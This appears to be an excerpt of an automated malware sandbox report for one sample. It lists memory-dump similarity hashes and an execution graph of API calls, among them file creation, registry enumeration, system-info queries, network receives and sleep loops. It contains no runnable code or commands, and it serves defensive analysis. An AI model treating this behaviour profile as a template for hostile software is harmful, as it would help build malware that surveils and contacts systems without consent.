                    • Snapshot File: hcaresult_0_2_5750000_11NdzR12PS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c71faa8a0c5868aacb7360a997a6076af7c8ba5eae5fdec3806c3dca37e0483d
                    • Instruction ID: cff942a247ff617ef0fed1e0372f7bcab67d614cadd9fed08791344b644ba1a8
                    • Opcode Fuzzy Hash: c71faa8a0c5868aacb7360a997a6076af7c8ba5eae5fdec3806c3dca37e0483d
                    • Instruction Fuzzy Hash: AB21A4FB24C264BDB242D4916B5DAFB67AFD6C3730730C42AFC42C6502D2D51A597131
                    Memory Dump Source
                    • Source File: 00000000.00000002.1709008477.0000000005750000.00000040.00001000.00020000.00000000.sdmp, Offset: 05750000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5750000_11NdzR12PS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d72ccb5338883889d19b49f4c19b5af0a9df0b4ff154d5abbc00c3ff1ee8e2d0
                    • Instruction ID: 6eeb0070a6d4dd689d95920a7887acb8dcf8776ca04d0c199f38574f3c10ab63
                    • Opcode Fuzzy Hash: d72ccb5338883889d19b49f4c19b5af0a9df0b4ff154d5abbc00c3ff1ee8e2d0
                    • Instruction Fuzzy Hash: 7121FBAB14C3647DB142D4911B5CAF66BAFD6C3330730C42AFD43C9502D2D50A597131
                    Memory Dump Source
                    • Source File: 00000000.00000002.1709008477.0000000005750000.00000040.00001000.00020000.00000000.sdmp, Offset: 05750000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5750000_11NdzR12PS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6c194b927ff5d3813d51c7a74449d2e65e0c878cc71fc8f1b75bb2f7cc2b287a
                    • Instruction ID: fba46153735234aa5523e78387789d45d04cb1d680a5e79ecb9356f353c87f8e
                    • Opcode Fuzzy Hash: 6c194b927ff5d3813d51c7a74449d2e65e0c878cc71fc8f1b75bb2f7cc2b287a
                    • Instruction Fuzzy Hash: 5A1160EB14C264BDB181D4916B5DAFA67AFE6C7730730C426FD43C5502D2D51A5A3132
                    Memory Dump Source
                    • Source File: 00000000.00000002.1709008477.0000000005750000.00000040.00001000.00020000.00000000.sdmp, Offset: 05750000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5750000_11NdzR12PS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 05b89e9620131aa1195096707b99d116d435d69857bc0ecd9a4afc7e45d7081c
                    • Instruction ID: b2c53a02a8b6581631ca1fab8deb12e369837afe4d11c3fc0ec0bfa49d3dcac8
                    • Opcode Fuzzy Hash: 05b89e9620131aa1195096707b99d116d435d69857bc0ecd9a4afc7e45d7081c
                    • Instruction Fuzzy Hash: 401190EF14C2647DB182D0916B5CAFB676FD6C6730730C426FD03C5A02D2D91A5A3132
                    Memory Dump Source
                    • Source File: 00000000.00000002.1709008477.0000000005750000.00000040.00001000.00020000.00000000.sdmp, Offset: 05750000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5750000_11NdzR12PS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 92445183126d224b99a2b19426fda6b7a83ec99f1c78672818cedc6a4ac931c5
                    • Instruction ID: 982dfba15757d66e96de02567eff2d1b6931d273d0eb0182ad52f2c3c4cdbe51
                    • Opcode Fuzzy Hash: 92445183126d224b99a2b19426fda6b7a83ec99f1c78672818cedc6a4ac931c5
                    • Instruction Fuzzy Hash: 6D11D6EB1482647EB181D0956B5CAF7675ED6C6730730C42BFC03C9906D2D51A5A3131
                    Memory Dump Source
                    • Source File: 00000000.00000002.1709008477.0000000005750000.00000040.00001000.00020000.00000000.sdmp, Offset: 05750000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5750000_11NdzR12PS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 61bb145c6ac29ebf97b46e5ba6bf394a217496d62392bc42c41ac1a2f3df6768
                    • Instruction ID: 885fbb1cead020ecb4fb1ae2606492c5827cb623e5b87c69228972d0f6ab8f62
                    • Opcode Fuzzy Hash: 61bb145c6ac29ebf97b46e5ba6bf394a217496d62392bc42c41ac1a2f3df6768
                    • Instruction Fuzzy Hash: C211C8EB1083647EF181D1A56B6DAF7675ED6C6730B30C427FC03CAA42D2D51A5A7132
                    Memory Dump Source
                    • Source File: 00000000.00000002.1709008477.0000000005750000.00000040.00001000.00020000.00000000.sdmp, Offset: 05750000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5750000_11NdzR12PS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f945ef53ea8712f5b3041831e449a518383020cbef182233b9d9e7f71e72455e
                    • Instruction ID: 4c67a8c40fe348e16a9a145ac5d8e89d7b70a2fc09e2bc6a7dfc8f3b4ef25b72
                    • Opcode Fuzzy Hash: f945ef53ea8712f5b3041831e449a518383020cbef182233b9d9e7f71e72455e
                    • Instruction Fuzzy Hash: 3F016DAB14D370BEB182C0962B19AF7176ED6E2730730C826F843C4946C5C92A597172
                    Memory Dump Source
                    • Source File: 00000000.00000002.1709008477.0000000005750000.00000040.00001000.00020000.00000000.sdmp, Offset: 05750000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5750000_11NdzR12PS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7188c6920792cf80f5c5500a368bda8ae9abaa459d0d013df081f0c83344195f
                    • Instruction ID: f84d6f3d32bc60ff5f611cc50677e67b659d954ff03410b3279e51d02c1cf456
                    • Opcode Fuzzy Hash: 7188c6920792cf80f5c5500a368bda8ae9abaa459d0d013df081f0c83344195f
                    • Instruction Fuzzy Hash: 2CF0C2EB24C2247DB181D0922F18BF727AED6D6730730C526F803C4846C6C51A8A3131

                    Execution Graph

                    Execution Coverage:6.3%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:5.6%
                    Total number of Nodes:608
                    Total number of Limit Nodes:41
                    execution_graph 13934 6cd6ef 13935 6cd6fc __fassign 13934->13935 13936 6cd73a __dosmaperr 13935->13936 13937 6cd727 RtlAllocateHeap 13935->13937 13937->13935 13937->13936 14646 6ab7e9 14647 6ab6e5 11 API calls 14646->14647 14649 6ab811 Concurrency::details::_Reschedule_chore 14647->14649 14648 6ab836 14651 6ab648 11 API calls 14648->14651 14649->14648 14653 6acade 14649->14653 14652 6ab84e 14651->14652 14654 6acafc 14653->14654 14655 6acaec TpCallbackUnloadDllOnCompletion 14653->14655 14654->14648 14655->14654 13938 6c6beb 13945 6c6bf7 13938->13945 13940 6c6c26 13941 6c6c35 13940->13941 13942 6c6c43 13940->13942 13943 6c6c99 9 API calls 13941->13943 13958 6c68bd 13942->13958 13946 6c6c3f 13943->13946 13950 6c8aaf 13945->13950 13947 6c6c5d 13948 6c6c71 ___free_lconv_mon 13947->13948 13961 6c6c99 13947->13961 13951 6c8ab4 __fassign 13950->13951 13954 6c8abf 13951->13954 13973 6cd4f4 13951->13973 13970 6c651d 13954->13970 13955 6cd727 RtlAllocateHeap 13956 6cd73a __dosmaperr 13955->13956 13957 6c8af2 __fassign 13955->13957 13956->13940 13957->13955 13957->13956 13992 6c683a 13958->13992 13960 6c68cf 13960->13947 13962 6c6cc4 __cftof 13961->13962 13968 6c6ca7 __cftof __dosmaperr 13961->13968 13963 6c6d06 CreateFileW 13962->13963 13969 6c6cea __cftof __dosmaperr 13962->13969 13964 6c6d38 13963->13964 13965 6c6d2a 13963->13965 14042 6c6d77 13964->14042 14028 6c6e01 GetFileType 13965->14028 13968->13948 13969->13948 13980 6c63f7 13970->13980 13974 6cd500 __fassign 13973->13974 13975 6c651d __fassign 2 API calls 13974->13975 13976 6cd55c __cftof __dosmaperr __fassign 13974->13976 13979 6cd6ee __fassign 13975->13979 13976->13954 13977 6cd727 RtlAllocateHeap 13978 6cd73a __dosmaperr 13977->13978 13977->13979 13978->13954 13979->13977 13979->13978 13982 6c6405 __fassign 13980->13982 13981 6c6450 13981->13957 13982->13981 13985 6c645b 13982->13985 13990 6ca1c2 GetPEB 13985->13990 13987 6c6465 13988 6c646a GetPEB 13987->13988 13989 6c647a __fassign 13987->13989 13988->13989 13991 6ca1dc __fassign 13990->13991 13991->13987 13993 6c685a 13992->13993 13997 6c6851 13992->13997 13993->13997 13998 6cb4bb 13993->13998 13997->13960 13999 6cb4ce 13998->13999 14000 6c6890 13998->14000 13999->14000 14006 6cf46b 13999->14006 14002 6cb4e8 14000->14002 14003 6cb4fb 14002->14003 14005 6cb510 14002->14005 14003->14005 14011 6ce571 14003->14011 14005->13997 14007 6cf477 __fassign 14006->14007 14008 6cf4c6 14007->14008 14009 6c8aaf __fassign 4 API calls 14007->14009 14008->14000 14010 6cf4eb 14009->14010 14012 6ce57b 14011->14012 14015 6ce489 14012->14015 14014 6ce581 14014->14005 14019 6ce495 __fassign ___free_lconv_mon 14015->14019 14016 6ce4b6 14016->14014 14017 6c8aaf __fassign 4 API calls 14018 6ce528 14017->14018 14020 6ce564 14018->14020 14024 6ca5ee 14018->14024 14019->14016 14019->14017 14020->14014 14025 6ca611 14024->14025 14026 6c8aaf __fassign 4 API calls 14025->14026 14027 6ca687 14026->14027 14029 6c6e3c 14028->14029 14035 6c6ed2 __dosmaperr 14028->14035 14030 6c6e56 __cftof 14029->14030 14064 6c7177 14029->14064 14032 6c6e75 GetFileInformationByHandle 14030->14032 14030->14035 14033 6c6e8b 14032->14033 14032->14035 14050 6c70c9 14033->14050 14035->13969 14038 6c6ea8 14039 6c6f71 SystemTimeToTzSpecificLocalTime 14038->14039 14040 6c6ebb 14039->14040 14041 6c6f71 SystemTimeToTzSpecificLocalTime 14040->14041 14041->14035 14087 6c7314 14042->14087 14044 6c6d85 14045 6c6d8a __dosmaperr 14044->14045 14046 6c70c9 4 API calls 14044->14046 14045->13969 14047 6c6da3 14046->14047 14048 6c7177 RtlAllocateHeap 14047->14048 14049 6c6dc2 14048->14049 14049->13969 14051 6c70df _wcsrchr 14050->14051 14059 6c6e97 14051->14059 14068 6cb9e4 14051->14068 14053 6c7123 14054 6cb9e4 4 API calls 14053->14054 14053->14059 14055 6c7134 14054->14055 14056 6cb9e4 4 API calls 14055->14056 14055->14059 14057 6c7145 14056->14057 14058 6cb9e4 4 API calls 14057->14058 14057->14059 14058->14059 14060 6c6f71 14059->14060 14061 6c6f89 14060->14061 14062 6c6fa9 SystemTimeToTzSpecificLocalTime 14061->14062 14063 6c6f8f 14061->14063 14062->14063 14063->14038 14065 6c7190 14064->14065 14067 6c71a4 __dosmaperr 14065->14067 14079 6cb568 14065->14079 14067->14030 14069 6cb9f2 14068->14069 14072 6cb9f8 __cftof __dosmaperr 14069->14072 14073 6cba2d 14069->14073 14071 6cba28 14071->14053 14072->14053 14074 6cba57 14073->14074 14077 6cba3d __cftof __dosmaperr 14073->14077 14075 6c683a __fassign 4 API calls 14074->14075 14074->14077 14076 6cba81 14075->14076 14076->14077 14078 6cb9a5 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 14076->14078 14077->14071 14078->14076 14080 6cb592 __cftof 14079->14080 14082 6cb5ae __dosmaperr ___free_lconv_mon 14080->14082 14083 6cd6ef 14080->14083 14082->14067 14084 6cd6fc __fassign 14083->14084 14085 6cd73a __dosmaperr 14084->14085 14086 6cd727 RtlAllocateHeap 14084->14086 14085->14082 14086->14084 14086->14085 14088 6c7338 14087->14088 14090 6c733e 14088->14090 14091 6c7036 14088->14091 14090->14044 14092 6c7042 __dosmaperr 14091->14092 14097 6cb87b 14092->14097 14094 6c7068 14094->14090 14095 6c705a __dosmaperr 14095->14094 14096 6cb87b RtlAllocateHeap 14095->14096 14096->14094 14100 6cb6de 14097->14100 14099 6cb894 14099->14095 14101 6cb6ee 14100->14101 14103 6cb6f5 14101->14103 14104 6d1ef8 14101->14104 14103->14099 14107 6d1d22 14104->14107 14106 6d1f0f 14106->14103 14108 6d1d54 14107->14108 14110 6d1d40 __cftof __dosmaperr 14107->14110 14109 6cb568 RtlAllocateHeap 14108->14109 14108->14110 14109->14110 14110->14106 14307 697400 14308 697435 shared_ptr 14307->14308 14312 69752f shared_ptr 14308->14312 14313 6ad041 14308->14313 14310 6975bd 14310->14312 14317 6acff7 14310->14317 14315 6ad052 14313->14315 14314 6ad05a 14314->14310 14315->14314 14321 6ad0c9 14315->14321 14318 6ad007 14317->14318 14319 6ad0af 14318->14319 14320 6ad0ab RtlWakeAllConditionVariable 14318->14320 14319->14312 14320->14312 14322 6ad0d7 SleepConditionVariableCS 14321->14322 14324 6ad0f0 14321->14324 14322->14324 14324->14315 14335 6a6ae0 14336 6a6b10 14335->14336 14339 6a46c0 14336->14339 14338 6a6b5c Sleep 14338->14336 14341 6a4d80 shared_ptr 14339->14341 14343 6a46fb 14339->14343 14340 6a4e69 shared_ptr 14340->14338 14341->14340 14367 6965b0 14341->14367 14343->14341 14344 69bd60 5 API calls 14343->14344 14355 6a4753 shared_ptr __dosmaperr 14344->14355 14345 6a4f25 shared_ptr 14346 6a4fee shared_ptr 14345->14346 14350 6a6ab6 14345->14350 14375 697d00 14346->14375 14348 6a4ffd 14381 6982b0 14348->14381 14352 6a46c0 18 API calls 14350->14352 14351 6a4a0d 14351->14341 14353 69bd60 5 API calls 14351->14353 14354 6a6b5c Sleep 14352->14354 14357 6a4a72 shared_ptr 14353->14357 14354->14350 14355->14351 14356 6c8979 4 API calls 14355->14356 14356->14351 14357->14341 14360 6a42a0 14357->14360 14359 6a5016 shared_ptr 14359->14338 14361 6a42e2 14360->14361 14363 6a4556 14361->14363 14365 6a4308 shared_ptr 14361->14365 14362 6a4520 shared_ptr 14362->14341 14364 6a3550 16 API calls 14363->14364 14364->14362 14365->14362 14385 6a3550 14365->14385 14368 69660f 14367->14368 14369 692280 4 API calls 14368->14369 14370 696699 shared_ptr 14369->14370 14371 692280 4 API calls 14370->14371 14372 696822 shared_ptr 14370->14372 14373 696727 shared_ptr 14371->14373 14372->14345 14373->14372 14374 692280 4 API calls 14373->14374 14374->14373 14377 697d66 shared_ptr __cftof 14375->14377 14376 697ea3 GetNativeSystemInfo 14378 697ea7 14376->14378 14377->14376 14377->14378 14380 697eb8 shared_ptr 14377->14380 14378->14380 14469 6c8a81 14378->14469 14380->14348 14384 698315 shared_ptr __cftof 14381->14384 14382 698454 GetNativeSystemInfo 14383 698333 14382->14383 14383->14359 14384->14382 14384->14383 14386 6a3b92 shared_ptr std::_Xinvalid_argument 14385->14386 14387 6a358f shared_ptr 14385->14387 14386->14365 14387->14386 14392 6a38f5 shared_ptr __dosmaperr 14387->14392 14398 69aca0 14387->14398 14388 6c8979 4 API calls 14390 6a3a8a 14388->14390 14390->14386 14391 6a3e52 14390->14391 14394 6a3b9d 14390->14394 14396 6a3ab2 14390->14396 14424 6a2e20 14391->14424 14392->14386 14392->14388 14407 6a1dd0 14394->14407 14403 6a07f0 14396->14403 14400 69adf0 __cftof 14398->14400 14399 69ae16 shared_ptr 14399->14392 14400->14399 14442 695500 14400->14442 14402 69af7e 14404 6a0870 __dosmaperr 14403->14404 14405 6c8979 4 API calls 14404->14405 14406 6a0a6d 14405->14406 14411 6a1e6b shared_ptr __dosmaperr 14407->14411 14408 6a1e78 14409 69e440 6 API calls 14408->14409 14410 6a2936 shared_ptr std::_Xinvalid_argument 14409->14410 14410->14386 14411->14408 14411->14410 14412 6c8979 4 API calls 14411->14412 14413 6a2265 shared_ptr 14412->14413 14413->14410 14414 6c6659 RtlAllocateHeap 14413->14414 14415 6a267a 14414->14415 14415->14408 14416 6c66e7 4 API calls 14415->14416 14417 6a268b shared_ptr __dosmaperr 14416->14417 14417->14410 14418 6c8979 4 API calls 14417->14418 14419 6a2759 14418->14419 14419->14408 14419->14410 14420 6a27d1 14419->14420 14421 69e440 6 API calls 14420->14421 14422 6a2843 14421->14422 14422->14410 14423 695df0 2 API calls 14422->14423 14423->14410 14426 6a2ec5 shared_ptr __cftof 14424->14426 14430 6a2e64 14424->14430 14425 69e440 6 API calls 14431 6a3423 shared_ptr 14425->14431 14427 6a32de InternetCloseHandle InternetCloseHandle 14426->14427 14428 6a32f2 InternetCloseHandle InternetCloseHandle 14426->14428 14426->14430 14426->14431 14427->14426 14428->14426 14429 6a351a shared_ptr std::_Xinvalid_argument 14429->14386 14430->14425 14431->14429 14433 69aca0 4 API calls 14431->14433 14436 6a38f5 shared_ptr __dosmaperr 14431->14436 14432 6c8979 4 API calls 14434 6a3a8a 14432->14434 14433->14436 14434->14429 14435 6a3e52 14434->14435 14438 6a3b9d 14434->14438 14440 6a3ab2 14434->14440 14437 6a2e20 12 API calls 14435->14437 14436->14429 14436->14432 14437->14429 14439 6a1dd0 12 API calls 14438->14439 14439->14429 14441 6a07f0 4 API calls 14440->14441 14441->14429 14443 695520 14442->14443 14445 695620 14443->14445 14446 692280 14443->14446 14445->14402 14449 692240 14446->14449 14450 692256 14449->14450 14453 6c8667 14450->14453 14456 6c7456 14453->14456 14455 692264 14455->14443 14457 6c7496 14456->14457 14461 6c747e __cftof __dosmaperr 14456->14461 14458 6c683a __fassign 4 API calls 14457->14458 14457->14461 14459 6c74ae 14458->14459 14462 6c7a11 14459->14462 14461->14455 14464 6c7a22 14462->14464 14463 6c7a31 __cftof __dosmaperr 14463->14461 14464->14463 14465 6c7fb5 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 14464->14465 14466 6c7c0f GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 14464->14466 14467 6c7c35 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 14464->14467 14468 6c7d83 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 14464->14468 14465->14464 14466->14464 14467->14464 14468->14464 14470 6c86d7 4 API calls 14469->14470 14471 6c8a9f 14470->14471 14471->14380 14484 6aa140 14485 6aa1c0 14484->14485 14491 6a7040 14485->14491 14487 6aa1fc shared_ptr 14488 6aa3ee shared_ptr 14487->14488 14495 693ea0 14487->14495 14490 6aa3d6 14492 6a7081 __cftof __Mtx_init_in_situ 14491->14492 14494 6a72b6 14492->14494 14501 692e80 14492->14501 14494->14487 14496 693f08 14495->14496 14497 693ede 14495->14497 14498 693f18 14496->14498 14548 692bc0 14496->14548 14497->14490 14498->14490 14502 692f3e GetCurrentThreadId 14501->14502 14503 692ec6 14501->14503 14504 692f54 14502->14504 14505 692faf 14502->14505 14506 6ac5dc GetSystemTimePreciseAsFileTime 14503->14506 14504->14505 14511 6ac5dc GetSystemTimePreciseAsFileTime 14504->14511 14505->14494 14507 692ed2 14506->14507 14508 692fde 14507->14508 14514 692edd __Mtx_unlock 14507->14514 14509 6ac19a 10 API calls 14508->14509 14510 692fe4 14509->14510 14512 6ac19a 10 API calls 14510->14512 14513 692f79 14511->14513 14512->14513 14516 6ac19a 10 API calls 14513->14516 14517 692f80 __Mtx_unlock 14513->14517 14514->14510 14515 692f2f 14514->14515 14515->14502 14515->14505 14516->14517 14518 6ac19a 10 API calls 14517->14518 14519 692f98 __Cnd_broadcast 14517->14519 14518->14519 14519->14505 14520 6ac19a 10 API calls 14519->14520 14521 692ffc 14520->14521 14522 6ac5dc GetSystemTimePreciseAsFileTime 14521->14522 14531 693040 shared_ptr __Mtx_unlock 14522->14531 14523 693185 14524 6ac19a 10 API calls 14523->14524 14525 69318b 14524->14525 14526 6ac19a 10 API calls 14525->14526 14527 693191 14526->14527 14528 6ac19a 10 API calls 14527->14528 14536 693153 __Mtx_unlock 14528->14536 14529 693167 14529->14494 14530 6ac19a 10 API calls 14532 69319d 14530->14532 14531->14523 14531->14525 14531->14529 14533 6930f2 GetCurrentThreadId 14531->14533 14533->14529 14534 6930fb 14533->14534 14534->14529 14535 6ac5dc GetSystemTimePreciseAsFileTime 14534->14535 14537 69311f 14535->14537 14536->14529 14536->14530 14537->14523 14537->14527 14537->14536 14539 6abc7c 14537->14539 14542 6abaa2 14539->14542 14541 6abc8c 14541->14537 14543 6abacc 14542->14543 14544 6ace9b _xtime_get GetSystemTimePreciseAsFileTime 14543->14544 14547 6abad4 __Xtime_diff_to_millis2 14543->14547 14545 6abaff __Xtime_diff_to_millis2 14544->14545 14546 6ace9b _xtime_get GetSystemTimePreciseAsFileTime 14545->14546 14545->14547 14546->14547 14547->14541 14549 692bce 14548->14549 14555 6ab777 14549->14555 14551 692c02 14552 692c09 14551->14552 14561 692c40 14551->14561 14552->14490 14554 692c18 std::_Throw_future_error 14556 6ab784 14555->14556 14560 6ab7a3 Concurrency::details::_Reschedule_chore 14555->14560 14564 6acaa7 14556->14564 14558 6ab794 14558->14560 14566 6ab74e 14558->14566 14560->14551 14572 6ab72b 14561->14572 14563 692c72 shared_ptr 14563->14554 14565 6acac2 CreateThreadpoolWork 14564->14565 14565->14558 14567 6ab757 Concurrency::details::_Reschedule_chore 14566->14567 14570 6accfc 14567->14570 14569 6ab771 14569->14560 14571 6acd11 TpPostWork 14570->14571 14571->14569 14573 6ab747 14572->14573 14574 6ab737 14572->14574 14573->14563 14574->14573 14576 6ac9a8 14574->14576 14577 6ac9bd TpReleaseWork 14576->14577 14577->14573 14581 6a8700 14582 6a875a __cftof 14581->14582 14588 6a9ae0 14582->14588 14584 6a8784 14587 6a879c 14584->14587 14592 6943b0 14584->14592 14586 6a8809 std::_Throw_future_error 14589 6a9b15 14588->14589 14598 692ca0 14589->14598 14591 6a9b46 14591->14584 14593 6abe0f InitOnceExecuteOnce 14592->14593 14594 6943ca 14593->14594 14595 6943d1 14594->14595 14596 6c6beb 9 API calls 14594->14596 14595->14586 14597 6943e4 14596->14597 14599 692cdd 14598->14599 14600 6abe0f InitOnceExecuteOnce 14599->14600 14601 692d06 14600->14601 14602 692d48 14601->14602 14603 692d11 14601->14603 14607 6abe27 14601->14607 14614 692400 14602->14614 14603->14591 14608 6abe33 std::_Throw_future_error 14607->14608 14609 6abe9a 14608->14609 14610 6abea3 14608->14610 14617 6abdaf 14609->14617 14612 692aa0 10 API calls 14610->14612 14613 6abe9f 14612->14613 14613->14602 14635 6ab506 14614->14635 14616 692432 14618 6acb61 InitOnceExecuteOnce 14617->14618 14619 6abdc7 14618->14619 14620 6abdce 14619->14620 14623 6c6beb 14619->14623 14620->14613 14622 6abdd7 14622->14613 14630 6c6bf7 14623->14630 14624 6c8aaf __fassign 4 API calls 14625 6c6c26 14624->14625 14626 6c6c35 14625->14626 14627 6c6c43 14625->14627 14628 6c6c99 9 API calls 14626->14628 14629 6c68bd 4 API calls 14627->14629 14631 6c6c3f 14628->14631 14632 6c6c5d 14629->14632 14630->14624 14631->14622 14633 6c6c71 ___free_lconv_mon 14632->14633 14634 6c6c99 9 API calls 14632->14634 14633->14622 14634->14633 14637 6ab521 std::_Throw_future_error 14635->14637 14636 6c8aaf __fassign 4 API calls 14638 6ab5cf 14636->14638 14637->14636 14639 6ab588 __fassign 14637->14639 14639->14616 14231 6ab85e 14236 6ab6e5 14231->14236 14233 6ab886 14244 6ab648 14233->14244 14235 6ab89f 14237 6ab6f1 Concurrency::details::_Reschedule_chore 14236->14237 14238 6ab722 14237->14238 14254 6ac5dc 14237->14254 14238->14233 14242 6ab70c __Mtx_unlock 14243 692ad0 10 API calls 14242->14243 14243->14238 14245 6ab654 Concurrency::details::_Reschedule_chore 14244->14245 14246 6ac5dc GetSystemTimePreciseAsFileTime 14245->14246 14247 6ab6ae 14245->14247 14248 6ab669 14246->14248 14247->14235 14249 692ad0 10 API calls 14248->14249 14250 6ab66f __Mtx_unlock 14249->14250 14251 692ad0 10 API calls 14250->14251 14252 6ab68c __Cnd_broadcast 14251->14252 14252->14247 14253 692ad0 10 API calls 14252->14253 14253->14247 14262 6ac382 14254->14262 14256 6ab706 14257 692ad0 14256->14257 14258 692ada 14257->14258 14259 692adc 14257->14259 14258->14242 14279 6ac19a 14259->14279 14263 6ac3d8 14262->14263 14265 6ac3aa 14262->14265 14263->14265 14268 6ace9b 14263->14268 14265->14256 14266 6ac42d __Xtime_diff_to_millis2 14266->14265 14267 6ace9b _xtime_get GetSystemTimePreciseAsFileTime 14266->14267 14267->14266 14269 6aceaa 14268->14269 14271 6aceb7 __aulldvrm 14268->14271 14269->14271 14272 6ace74 14269->14272 14271->14266 14275 6acb1a 14272->14275 14276 6acb2b GetSystemTimePreciseAsFileTime 14275->14276 14277 6acb37 14275->14277 14276->14277 14277->14271 14280 6ac1c2 14279->14280 14281 6ac1a4 14279->14281 14280->14280 14281->14280 14283 6ac1c7 14281->14283 14286 692aa0 14283->14286 14285 6ac1de std::_Throw_future_error 14285->14281 14300 6abe0f 14286->14300 14288 692abf 14288->14285 14289 6c8aaf __fassign 4 API calls 14290 6c6c26 14289->14290 14292 6c6c35 14290->14292 14293 6c6c43 14290->14293 14291 692ab4 14291->14288 14291->14289 14294 6c6c99 9 API calls 14292->14294 14295 6c68bd 4 API calls 14293->14295 14296 6c6c3f 14294->14296 14297 6c6c5d 14295->14297 14296->14285 14298 6c6c99 9 API calls 14297->14298 14299 6c6c71 ___free_lconv_mon 14297->14299 14298->14299 14299->14285 14303 6acb61 14300->14303 14304 6acb6f InitOnceExecuteOnce 14303->14304 14306 6abe22 14303->14306 14304->14306 14306->14291 14578 6c6559 14579 6c63f7 __fassign 2 API calls 14578->14579 14580 6c656a 14579->14580 14479 6c6974 14480 6c698c 14479->14480 14481 6c6982 14479->14481 14482 6c68bd 4 API calls 14480->14482 14483 6c69a6 ___free_lconv_mon 14482->14483 14325 69e410 14326 69e435 14325->14326 14328 69e419 14325->14328 14328->14326 14329 69e270 14328->14329 14330 69e280 __dosmaperr 14329->14330 14331 6c8979 4 API calls 14330->14331 14333 69e2bd std::_Xinvalid_argument 14331->14333 14332 69e435 14332->14328 14333->14332 14334 69e270 4 API calls 14333->14334 14334->14333 14472 6986b0 14473 6986b6 14472->14473 14474 6c6659 RtlAllocateHeap 14473->14474 14475 6986c3 14474->14475 14476 6986d6 14475->14476 14477 6c66e7 4 API calls 14475->14477 14478 6986d0 14477->14478 14657 69dfd0 recv 14658 69e032 recv 14657->14658 14659 69e067 recv 14658->14659 14660 69e0a1 14659->14660 14661 69e1c3 14660->14661 14662 6ac5dc GetSystemTimePreciseAsFileTime 14660->14662 14663 69e1fe 14662->14663 14664 6ac19a 10 API calls 14663->14664 14665 69e268 14664->14665 14111 6a1dd0 14115 6a1e6b shared_ptr __dosmaperr 14111->14115 14112 6a1e78 14113 69e440 6 API calls 14112->14113 14114 6a2936 shared_ptr std::_Xinvalid_argument 14113->14114 14115->14112 14115->14114 14128 6c8979 14115->14128 14117 6a2265 shared_ptr 14117->14114 14132 6c6659 14117->14132 14121 6a268b shared_ptr __dosmaperr 14121->14114 14122 6c8979 4 API calls 14121->14122 14123 6a2759 14122->14123 14123->14112 14123->14114 14124 6a27d1 14123->14124 14139 69e440 14124->14139 14126 6a2843 14126->14114 14154 695df0 14126->14154 14129 6c8994 14128->14129 14161 6c86d7 14129->14161 14131 6c899e 14131->14117 14185 6c65a2 14132->14185 14134 6a267a 14134->14112 14135 6c66e7 14134->14135 14136 6c66f3 14135->14136 14138 6c66fd __cftof __dosmaperr 14136->14138 14197 6c6670 14136->14197 14138->14121 14140 69e489 14139->14140 14220 69bd60 14140->14220 14142 69e9a9 shared_ptr 14142->14126 14143 69e711 14143->14142 14144 69e440 6 API calls 14143->14144 14146 69f696 14144->14146 14145 69f892 shared_ptr 14145->14126 14146->14145 14147 69e440 6 API calls 14146->14147 14149 69f973 14147->14149 14148 69fa45 shared_ptr 14148->14126 14149->14148 14150 6c6659 RtlAllocateHeap 14149->14150 14151 69fbf1 14150->14151 14152 69e440 6 API calls 14151->14152 14153 6a054c shared_ptr 14152->14153 14153->14126 14156 695e28 14154->14156 14155 695f0e shared_ptr 14155->14114 14156->14155 14157 696060 RegOpenKeyExA 14156->14157 14158 69645a shared_ptr 14157->14158 14160 6960b3 __cftof 14157->14160 14158->14114 14159 696153 RegEnumValueW 14159->14160 14160->14158 14160->14159 14162 6c86e9 14161->14162 14163 6c86fe __cftof __dosmaperr 14162->14163 14164 6c683a __fassign 4 API calls 14162->14164 14163->14131 14166 6c872e 14164->14166 14166->14163 14167 6c8925 14166->14167 14168 6c8962 14167->14168 14169 6c8932 14167->14169 14178 6cd2e9 14168->14178 14170 6c8941 __fassign 14169->14170 14173 6cd30d 14169->14173 14170->14166 14174 6c683a __fassign 4 API calls 14173->14174 14175 6cd32a 14174->14175 14177 6cd33a 14175->14177 14182 6cf07f 14175->14182 14177->14170 14179 6cd2f4 14178->14179 14180 6cb4bb __fassign 4 API calls 14179->14180 14181 6cd304 14180->14181 14181->14170 14183 6c683a __fassign 4 API calls 14182->14183 14184 6cf09f __cftof __fassign __freea 14183->14184 14184->14177 14187 6c65ae 14185->14187 14186 6c65b5 __cftof __dosmaperr 14186->14134 14187->14186 14189 6ca783 14187->14189 14190 6ca78f 14189->14190 14193 6ca827 14190->14193 14192 6ca7aa 14192->14186 14196 6ca84a 14193->14196 14194 6cd6ef RtlAllocateHeap 14195 6ca890 ___free_lconv_mon 14194->14195 14195->14192 14196->14194 14196->14195 14198 6c6692 14197->14198 14200 6c667d __cftof __dosmaperr ___free_lconv_mon 14197->14200 14198->14200 14201 6c9ef9 14198->14201 14200->14138 14202 6c9f11 14201->14202 14204 6c9f36 14201->14204 14202->14204 14205 6d02f8 14202->14205 14204->14200 14207 6d0304 14205->14207 14206 6d030c 